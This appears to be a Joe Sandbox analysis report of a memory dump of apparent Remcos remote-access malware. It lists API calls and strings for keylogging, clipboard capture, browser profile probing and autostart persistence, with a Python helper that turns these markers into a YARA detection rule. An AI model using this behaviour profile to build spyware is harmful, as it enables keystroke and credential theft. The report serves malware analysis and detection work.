                                      • String ID: pow
                                      • API String ID: 3213639722-2276729525
                                      • Opcode ID: 2302c5609f2f42c30a7edd261cf613bc4ec1abe068b3f65e7bf1a532cbdd803e
                                      • Instruction ID: c1bd9447eb3af5ab5670dd6ce79118ae8f013003e07bb3453e4e309ffb0606bf
                                      • Opcode Fuzzy Hash: 2302c5609f2f42c30a7edd261cf613bc4ec1abe068b3f65e7bf1a532cbdd803e
                                      • Instruction Fuzzy Hash: 9A515861E0420397CB167B14C9C037A6BA4EB40B90F248DEDF896872A9EF358594FA46
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02B04066
                                        • Part of subcall function 02B1B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,02B66468,02B0D20D,.vbs,?,?,?,?,?,02B752F0), ref: 02B1B99F
                                        • Part of subcall function 02B18568: CloseHandle.KERNEL32(02B040F5,?,?,02B040F5,02B65E74), ref: 02B1857E
                                        • Part of subcall function 02B18568: CloseHandle.KERNEL32(02B65E74,?,?,02B040F5,02B65E74), ref: 02B18587
                                        • Part of subcall function 02B1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02B0A843), ref: 02B1C49E
                                      • Sleep.KERNEL32(000000FA,02B65E74), ref: 02B04138
                                      Strings
                                      • /sort "Visit Time" /stext ", xrefs: 02B040B2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                      • String ID: /sort "Visit Time" /stext "
                                      • API String ID: 368326130-1573945896
                                      • Opcode ID: c9f6f52be8e38b545e21ed84e1a4b4951061bb05c994a32e564b7afc9617e8c0
                                      • Instruction ID: 0fd0471888c211dacb71d33c6695e2d10144ffae294154c65fb09d229306b98e
                                      • Opcode Fuzzy Hash: c9f6f52be8e38b545e21ed84e1a4b4951061bb05c994a32e564b7afc9617e8c0
                                      • Instruction Fuzzy Hash: 85314171A102185BDB1AF7B4D8D59EEBB7BAF91300F4000E9E50AA71D4EF605D49CF91
                                      APIs
                                        • Part of subcall function 02B34770: __onexit.LIBCMT ref: 02B34776
                                      • __Init_thread_footer.LIBCMT ref: 02B0B797
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Init_thread_footer__onexit
                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                      • API String ID: 1881088180-3686566968
                                      • Opcode ID: e7fb8275b99b4f833e7935bc024e452447549ca1a2bd949a1a8a0b644106765a
                                      • Instruction ID: d9d8aba434c1dca21e7eb70f83f446bde8d7d71a925950d3f4201558ea8c11ce
                                      • Opcode Fuzzy Hash: e7fb8275b99b4f833e7935bc024e452447549ca1a2bd949a1a8a0b644106765a
                                      • Instruction Fuzzy Hash: FB219132A102088ACB1AFB64D8D1DEDBB7AAF54314F5005E9D50A571D1EF34AD4ACE90
                                      APIs
                                      • GetACP.KERNEL32(?,20001004,?,00000002), ref: 02B51C12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ACP$OCP
                                      • API String ID: 0-711371036
                                      • Opcode ID: fdfa6dfeb5286579e3059ec766527ae5f664744bf971ec9908469da99f857866
                                      • Instruction ID: ef66e15a198da8bf5cfd0951f22e58989538a6395f6f086a1c7d5f3d7739f521
                                      • Opcode Fuzzy Hash: fdfa6dfeb5286579e3059ec766527ae5f664744bf971ec9908469da99f857866
                                      • Instruction Fuzzy Hash: C821D662A64520A7DB24DF6CC940BAB736AEB48B65F4685E4ED0EDF100F732D940C390
                                      APIs
                                      • GetLocalTime.KERNEL32(?,02B75598,?,00000000,?,?,?,?,?,?,02B15CC9,?,00000001,0000004C,00000000), ref: 02B05030
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • GetLocalTime.KERNEL32(?,02B75598,?,00000000,?,?,?,?,?,?,02B15CC9,?,00000001,0000004C,00000000), ref: 02B05087
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 02B0501F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 481472006-1507639952
                                      • Opcode ID: f127b2bd2432dc64aa170835f952f37bbd7b446255bda62ff3d957f9ded4b656
                                      • Instruction ID: ca242795e3d15dc61c45d71a857d44310b8a67a72f8f3cd16970885d140a22c0
                                      • Opcode Fuzzy Hash: f127b2bd2432dc64aa170835f952f37bbd7b446255bda62ff3d957f9ded4b656
                                      • Instruction Fuzzy Hash: FD2123A1D002805BD722B734D889B3FBF99EB55388FC408ADDC8507185EA29961CCFE3
                                      APIs
                                      • GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: | $%02i:%02i:%02i:%03i
                                      • API String ID: 481472006-2430845779
                                      • Opcode ID: f5b6ae1a0bdeb87c500a18fae6907d3c1fdd1d0efd0d79f63e910959523664e8
                                      • Instruction ID: d62765d2ceb5363fae162963c1d7d9f827fbb370dac38b4e6040ee0272c8ba8b
                                      • Opcode Fuzzy Hash: f5b6ae1a0bdeb87c500a18fae6907d3c1fdd1d0efd0d79f63e910959523664e8
                                      • Instruction Fuzzy Hash: 5F11B9714182445AC309FB65D8949FFBBEAAF48340F40099EF8D5830D0EF38DA49CB55
                                      APIs
                                        • Part of subcall function 02B0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02B0B172
                                        • Part of subcall function 02B0B164: wsprintfW.USER32 ref: 02B0B1F3
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • CloseHandle.KERNEL32(?), ref: 02B0B0B4
                                      • UnhookWindowsHookEx.USER32 ref: 02B0B0C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                      • String ID: Online Keylogger Stopped
                                      • API String ID: 1623830855-1496645233
                                      • Opcode ID: 0b229c212c3bee96c52558c9ece92d50b9c2673c9e99a8b5fe993b4efc24b922
                                      • Instruction ID: 682d303563b2d9b6d9eff77cf2a0535d56b9346999417ee27606758959f4d35f
                                      • Opcode Fuzzy Hash: 0b229c212c3bee96c52558c9ece92d50b9c2673c9e99a8b5fe993b4efc24b922
                                      • Instruction Fuzzy Hash: CC01D431A042049BDB227B38C84AB7E7FB6AB42304F8004DDD946075D5FF661459DFD2
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02B0C4F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                      • API String ID: 1174141254-4188645398
                                      • Opcode ID: aa04110589378f695a926f37751ec12dd355a1c518c8e37f574f7fcf9075e706
                                      • Instruction ID: bc80f26c20518f1537303c50f7754149ec59903bf949c5bd7a670fdcca2d871f
                                      • Opcode Fuzzy Hash: aa04110589378f695a926f37751ec12dd355a1c518c8e37f574f7fcf9075e706
                                      • Instruction Fuzzy Hash: 2FF08221900219969606B7F8DC8A8FF7F7E9F10741B4001E6A606A31D2EF649D45CAE1
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 02B0C5BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: AppData$\Opera Software\Opera Stable\
                                      • API String ID: 1174141254-1629609700
                                      • Opcode ID: 50383cbf803e04a0fde321343a91bce8a4fb05f18c926d416cd5dd8e70321a34
                                      • Instruction ID: 06b6ca3ff862379778c842763050a7c903785a143be5e780c17e8edd829f57ac
                                      • Opcode Fuzzy Hash: 50383cbf803e04a0fde321343a91bce8a4fb05f18c926d416cd5dd8e70321a34
                                      • Instruction Fuzzy Hash: FBF08C21A40319969A16F7F8DC8ACFF7F7E9F10701B4001E6A606A30D2EF649985CAE1
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02B0C559
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                      • API String ID: 1174141254-2800177040
                                      • Opcode ID: a5013449ad21387855addd31acdbfaf2b0a7b535580e8d1f6ed6aa56bb2c02d4
                                      • Instruction ID: 2ec6ca5c31124bca59cb8714999577b4e8ef03fd879b28d2ed12f817700e5730
                                      • Opcode Fuzzy Hash: a5013449ad21387855addd31acdbfaf2b0a7b535580e8d1f6ed6aa56bb2c02d4
                                      • Instruction Fuzzy Hash: 38F08221D00219969A16B7F8DC8A8FF7F7D9F10701B0045E6A606A31D2EF649981CAE1
                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 02B0B64B
                                        • Part of subcall function 02B0A3E0: GetForegroundWindow.USER32 ref: 02B0A416
                                        • Part of subcall function 02B0A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 02B0A422
                                        • Part of subcall function 02B0A3E0: GetKeyboardLayout.USER32(00000000), ref: 02B0A429
                                        • Part of subcall function 02B0A3E0: GetKeyState.USER32(00000010), ref: 02B0A433
                                        • Part of subcall function 02B0A3E0: GetKeyboardState.USER32(?), ref: 02B0A43E
                                        • Part of subcall function 02B0A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02B0A461
                                        • Part of subcall function 02B0A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02B0A4C1
                                        • Part of subcall function 02B0A636: SetEvent.KERNEL32(?,?,00000000,02B0B20A,00000000), ref: 02B0A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                      • String ID: [AltL]$[AltR]
                                      • API String ID: 2738857842-2658077756
                                      • Opcode ID: ac7722c5c1c522ae62066d3c5de4b38cd7aa9325273ba6f478aed3955a89514c
                                      • Instruction ID: 533832eacad8125abc285dc0a126617ba4e8012903498219fe0d9f59398d3021
                                      • Opcode Fuzzy Hash: ac7722c5c1c522ae62066d3c5de4b38cd7aa9325273ba6f478aed3955a89514c
                                      • Instruction Fuzzy Hash: 46E09B2174031053982E327D59AE7BD7E56C742654B8145CDFA434B6C8DD8E4D1587C2
                                      APIs
                                      • GetKeyState.USER32(00000012), ref: 02B0B6A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State
                                      • String ID: [CtrlL]$[CtrlR]
                                      • API String ID: 1649606143-2446555240
                                      • Opcode ID: f79b275d74642c62a4c4a59487a4cdd30caafcd0b88f6eda305a8070f6b85767
                                      • Instruction ID: 83d8948c2dd22330761296c7a0ccc7066d852bed2dbd407ebb9961928a50ff91
                                      • Opcode Fuzzy Hash: f79b275d74642c62a4c4a59487a4cdd30caafcd0b88f6eda305a8070f6b85767
                                      • Instruction Fuzzy Hash: 91E0CD21B0031053D53A36BD569F77C7F15DB42698F4105CDF9438B6D9DE4A851047C2
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,02B0D144,00000000,02B752D8,02B752F0,?,pth_unenc), ref: 02B13A31
                                      • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 02B13A45
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02B13A2F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteOpenValue
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                      • API String ID: 2654517830-1051519024
                                      • Opcode ID: 0e2eb2e0d87a54ace1307695b948c4d01a15afac7bdd7b5c402d809055379cae
                                      • Instruction ID: ffe9baa99cb7897608ca060e4312414ee7d5f59b4b647786dbe52cd85d66fe54
                                      • Opcode Fuzzy Hash: 0e2eb2e0d87a54ace1307695b948c4d01a15afac7bdd7b5c402d809055379cae
                                      • Instruction Fuzzy Hash: 57E0C23169421CFBDF104F71DC06FBE37ACDB02B40F000AD4BA0696080D7629A1496A0
                                      APIs
                                      • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 02B0B876
                                      • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 02B0B8A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteDirectoryFileRemove
                                      • String ID: pth_unenc
                                      • API String ID: 3325800564-4028850238
                                      • Opcode ID: 1aba857c6d0d7db95b20c12b0120f4b75fe14c57bce7083d4a512fa9a9cae35b
                                      • Instruction ID: 5829d8de33c1dcfef98c6d9b8741ac369d66e754a8f286701e0d6c32043c0c0f
                                      • Opcode Fuzzy Hash: 1aba857c6d0d7db95b20c12b0120f4b75fe14c57bce7083d4a512fa9a9cae35b
                                      • Instruction Fuzzy Hash: 26E08C32550B208BCB1AAB388888BD7779DAF10355B00099AD4D7D3590DF65E809DAA0
                                      APIs
                                      • TerminateProcess.KERNEL32(00000000,pth_unenc,02B0F8C8), ref: 02B12860
                                      • WaitForSingleObject.KERNEL32(000000FF), ref: 02B12873
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ObjectProcessSingleTerminateWait
                                      • String ID: pth_unenc
                                      • API String ID: 1872346434-4028850238
                                      • Opcode ID: eb407bc792d6f5f868ea9c96625cfc6d3792d11fc0301e6df15ee1eaee1a7be3
                                      • Instruction ID: 2c0f575fccde9449f21d9be807159c006c6c4834e46f8e7eac32f58bc3254b04
                                      • Opcode Fuzzy Hash: eb407bc792d6f5f868ea9c96625cfc6d3792d11fc0301e6df15ee1eaee1a7be3
                                      • Instruction Fuzzy Hash: 97D012749C9362EFEB350B60EE4DB043B98A7057E1F140A06FC61572F0C766443CEA51
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02B01D55), ref: 02B40D27
                                      • GetLastError.KERNEL32 ref: 02B40D35
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02B40D90
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      • Opcode ID: 9b5c48f9bda6204426fb7353f01406973a033de85d053f25b6692685ca8c74b1
                                      • Instruction ID: 14fd1700e468ff6c09463ef25a14705f52a4b5c4c83f7d131141d158701063e0
                                      • Opcode Fuzzy Hash: 9b5c48f9bda6204426fb7353f01406973a033de85d053f25b6692685ca8c74b1
                                      • Instruction Fuzzy Hash: E6411931500215EFCF29AF64C8C47BA7BB4EF41314F1089D9EE545B191DF329905EB90
                                      APIs
                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B11B8C
                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B11C58
                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B11C7A
                                      • SetLastError.KERNEL32(0000007E,02B11EF0), ref: 02B11C91
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastRead
                                      • String ID:
                                      • API String ID: 4100373531-0
                                      • Opcode ID: 7f6f1801a6213404aa62bdbb872805deb8c0d7631782f26e6d7d3c6e8dec359d
                                      • Instruction ID: 6cb19e83cd455599fa2272f1ff6cb6ce00da6532673af90ff1585a1869135d72
                                      • Opcode Fuzzy Hash: 7f6f1801a6213404aa62bdbb872805deb8c0d7631782f26e6d7d3c6e8dec359d
                                      • Instruction Fuzzy Hash: AE419675604306DFEB248F18D884B66B3E8FF48714F4408ADEA8ACB651EB31E804DB51
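The function summaries above surface a set of plaintext markers that are useful for triage beyond this one sample: the keep-alive log string, the keylogger state strings, the `pth_unenc` tag, the Chrome/Edge/Opera profile paths probed with PathFileExistsW, and the `Policies\Explorer\Run` autostart key opened with RegOpenKeyExW. Because they are passed to wide-character APIs (PathFileExistsW, wsprintfW, RegOpenKeyExW), they will sit in memory as UTF-16LE, not ASCII, which a naive `strings` pass misses. The following Python is an added triage helper, not part of the Joe Sandbox report or the Remcos code base: it scans a memory dump for each marker in both encodings, maps offsets to virtual addresses using the dump base (assumed here to be the 0x02B00000 base reported for the `rundll32` region), and emits a YARA rule with `ascii wide` modifiers. The dump it runs on is a constructed stand-in, not the `.sdmp` file from the analysis.

```python
"""Scan a memory dump for Remcos marker strings (ASCII and UTF-16LE) and emit a YARA rule.

Added triage example; the marker list is taken from the function summaries in this
report, the sample dump below is constructed for demonstration only.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import List

# Plaintext markers quoted in the report's per-function "String ID" entries.
REMCOS_MARKERS = [
    "KeepAlive | Enabled | Timeout:",
    "Offline Keylogger Started",
    "Online Keylogger Stopped",
    "pth_unenc",
    "\\AppData\\Local\\Google\\Chrome\\",
    "\\AppData\\Local\\Microsoft\\Edge\\",
    "\\Opera Software\\Opera Stable\\",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\",
]

# Base of the dumped region (report: Offset 02B00000, based on PE); assumption for VA mapping.
DEFAULT_BASE = 0x02B00000


@dataclass(frozen=True)
class Hit:
    marker: str
    encoding: str  # "ascii" or "utf-16le"
    offset: int    # byte offset inside the dump
    va: int        # base + offset


def find_markers(dump: bytes, base: int = DEFAULT_BASE,
                 markers: List[str] = REMCOS_MARKERS) -> List[Hit]:
    """Return every marker occurrence, searched in both ASCII and UTF-16LE form."""
    hits: List[Hit] = []
    for marker in markers:
        for enc in ("ascii", "utf-16le"):
            needle = marker.encode(enc)
            # re.escape on bytes makes the backslashes in the paths literal.
            for m in re.finditer(re.escape(needle), dump):
                hits.append(Hit(marker, enc, m.start(), base + m.start()))
    return sorted(hits, key=lambda h: h.offset)


def distinct_marker_count(hits: List[Hit]) -> int:
    """Number of different markers seen; a crude confidence score for the region."""
    return len({h.marker for h in hits})


def yara_rule(markers: List[str] = REMCOS_MARKERS,
              name: str = "Remcos_markers_from_report", minimum: int = 3) -> str:
    """Build a YARA rule whose strings match both narrow and wide encodings."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, marker in enumerate(markers):
        escaped = marker.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'        $s{i} = "{escaped}" ascii wide')
    lines += ["    condition:", f"        {minimum} of ($s*)", "}"]
    return "\n".join(lines)


def build_sample_dump() -> bytes:
    """Constructed stand-in for the 02B00000 region: a mix of wide and narrow markers."""
    blob = bytearray(b"\x00" * 0x40)
    blob += "Online Keylogger Stopped".encode("utf-16le") + b"\x00\x00"
    blob += b"\x90" * 0x20
    blob += b"pth_unenc\x00"                      # narrow, as in the A-suffixed call sites
    blob += b"\x00" * 0x10
    blob += "\\AppData\\Local\\Google\\Chrome\\".encode("utf-16le") + b"\x00\x00"
    blob += b"\xcc" * 0x20
    blob += "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\".encode("utf-16le")
    return bytes(blob)


if __name__ == "__main__":
    found = find_markers(build_sample_dump())
    for h in found:
        print(f"{h.va:08X} {h.encoding:8} {h.marker}")
    print(f"{distinct_marker_count(found)} distinct markers")
    print(yara_rule())
```

Point `find_markers` at the bytes of the `.sdmp` file and pass the base from the report's "Memory Dump Source" line; anything below `minimum` distinct markers is worth a manual look before calling it a Remcos region, since the browser paths alone also occur in legitimate software.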

                                      Execution Graph

                                      Execution Coverage:1.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:556
                                      Total number of Limit Nodes:10
                                      execution_graph 46622 2a34887 46623 2a34893 ___DestructExceptionObject 46622->46623 46648 2a34596 46623->46648 46626 2a3489a 46627 2a348c3 46626->46627 46944 2a349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 46626->46944 46635 2a34902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46627->46635 46945 2a44251 5 API calls _ValidateLocalCookies 46627->46945 46629 2a348dc 46631 2a348e2 ___DestructExceptionObject 46629->46631 46946 2a441f5 5 API calls _ValidateLocalCookies 46629->46946 46632 2a34962 46659 2a34b14 46632->46659 46635->46632 46947 2a433e7 35 API calls 5 library calls 46635->46947 46643 2a3498e 46645 2a34997 46643->46645 46948 2a433c2 28 API calls _abort 46643->46948 46949 2a3470d 13 API calls 2 library calls 46645->46949 46649 2a3459f 46648->46649 46950 2a34c52 IsProcessorFeaturePresent 46649->46950 46651 2a345ab 46951 2a38f31 10 API calls 4 library calls 46651->46951 46653 2a345b0 46654 2a345b4 46653->46654 46952 2a440bf 46653->46952 46654->46626 46657 2a345cb 46657->46626 47018 2a36e90 46659->47018 46662 2a34968 46663 2a441a2 46662->46663 47020 2a4f059 46663->47020 46665 2a34971 46668 2a0e9c5 46665->46668 46666 2a441ab 46666->46665 47024 2a46815 35 API calls 46666->47024 47026 2a1cb50 LoadLibraryA GetProcAddress 46668->47026 46670 2a0e9e1 GetModuleFileNameW 47031 2a0f3c3 46670->47031 46672 2a0e9fd 47046 2a020f6 46672->47046 46675 2a020f6 28 API calls 46676 2a0ea1b 46675->46676 47052 2a1be1b 46676->47052 46680 2a0ea2d 47078 2a01e8d 46680->47078 46682 2a0ea36 46683 2a0ea93 46682->46683 46684 2a0ea49 46682->46684 47084 2a01e65 22 API calls 46683->47084 47108 2a0fbb3 95 API calls 46684->47108 46687 2a0eaa3 47085 2a01e65 22 API calls 46687->47085 46688 2a0ea5b 47109 2a01e65 22 API calls 46688->47109 46690 2a0ea67 47110 2a10f37 36 API calls __EH_prolog 46690->47110 46692 2a0eac2 47086 2a0531e 28 API calls 46692->47086 
46695 2a0ead1 47087 2a06383 28 API calls 46695->47087 46696 2a0ea79 47111 2a0fb64 77 API calls 46696->47111 46699 2a0eadd 47088 2a01fe2 46699->47088 46700 2a0ea82 47112 2a0f3b0 70 API calls 46700->47112 46705 2a01fd8 11 API calls 46708 2a0eefb 46705->46708 46707 2a01fd8 11 API calls 46709 2a0eafb 46707->46709 46939 2a432f6 GetModuleHandleW 46708->46939 47100 2a01e65 22 API calls 46709->47100 46711 2a0eb04 47101 2a01fc0 28 API calls 46711->47101 46713 2a0eb0f 47102 2a01e65 22 API calls 46713->47102 46715 2a0eb28 47103 2a01e65 22 API calls 46715->47103 46717 2a0eb43 46718 2a0ebae 46717->46718 47113 2a06c1e 28 API calls 46717->47113 47104 2a01e65 22 API calls 46718->47104 46721 2a0eb70 46722 2a01fe2 28 API calls 46721->46722 46723 2a0eb7c 46722->46723 46726 2a01fd8 11 API calls 46723->46726 46724 2a0ec02 47105 2a0d069 46724->47105 46725 2a0ebbb 46725->46724 47115 2a13549 RegOpenKeyExA RegQueryValueExA RegCloseKey 46725->47115 46727 2a0eb85 46726->46727 47114 2a13549 RegOpenKeyExA RegQueryValueExA RegCloseKey 46727->47114 46729 2a0ec08 46731 2a0ea8b 46729->46731 47117 2a1b2c3 33 API calls 46729->47117 46731->46705 46734 2a0eba4 46734->46718 46736 2a0f34f 46734->46736 46735 2a0ec23 46738 2a0ec76 46735->46738 47118 2a07716 RegOpenKeyExA RegQueryValueExA RegCloseKey 46735->47118 47200 2a139a9 30 API calls 46736->47200 46737 2a0ebe6 46737->46724 47116 2a139a9 30 API calls 46737->47116 47123 2a01e65 22 API calls 46738->47123 46743 2a0f365 47201 2a12475 65 API calls ___scrt_get_show_window_mode 46743->47201 46744 2a0ec7f 46752 2a0ec90 46744->46752 46753 2a0ec8b 46744->46753 46745 2a0ec3e 46747 2a0ec42 46745->46747 46748 2a0ec4c 46745->46748 47119 2a07738 30 API calls 46747->47119 47121 2a01e65 22 API calls 46748->47121 47125 2a01e65 22 API calls 46752->47125 47124 2a07755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 46753->47124 46754 2a0ec47 47120 2a07260 97 API calls 46754->47120 46756 2a0f37f 47203 2a13a23 RegOpenKeyExW RegDeleteValueW 46756->47203 
46759 2a0ec99 47126 2a1bc5e 28 API calls 46759->47126 46761 2a0ec55 46761->46738 46765 2a0ec71 46761->46765 46762 2a0eca4 47127 2a01f13 28 API calls 46762->47127 47122 2a07260 97 API calls 46765->47122 46766 2a0f392 47204 2a01f09 11 API calls 46766->47204 46767 2a0ecaf 47128 2a01f09 11 API calls 46767->47128 46771 2a0f39c 47205 2a01f09 11 API calls 46771->47205 46772 2a0ecb8 47129 2a01e65 22 API calls 46772->47129 46775 2a0f3a5 47206 2a0dd42 27 API calls 46775->47206 46776 2a0ecc1 47130 2a01e65 22 API calls 46776->47130 46778 2a0f3aa 47207 2a14f2a 167 API calls 46778->47207 46782 2a0ecdb 47131 2a01e65 22 API calls 46782->47131 46784 2a0ecf5 47132 2a01e65 22 API calls 46784->47132 46786 2a0ed80 46789 2a0ed8a 46786->46789 46795 2a0ef06 ___scrt_get_show_window_mode 46786->46795 46787 2a0ed0e 46787->46786 47133 2a01e65 22 API calls 46787->47133 46790 2a0ed93 46789->46790 46798 2a0ee0f 46789->46798 47139 2a01e65 22 API calls 46790->47139 46792 2a0ed9c 47140 2a01e65 22 API calls 46792->47140 46793 2a0ed23 _wcslen 46793->46786 47134 2a01e65 22 API calls 46793->47134 47150 2a136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 46795->47150 46797 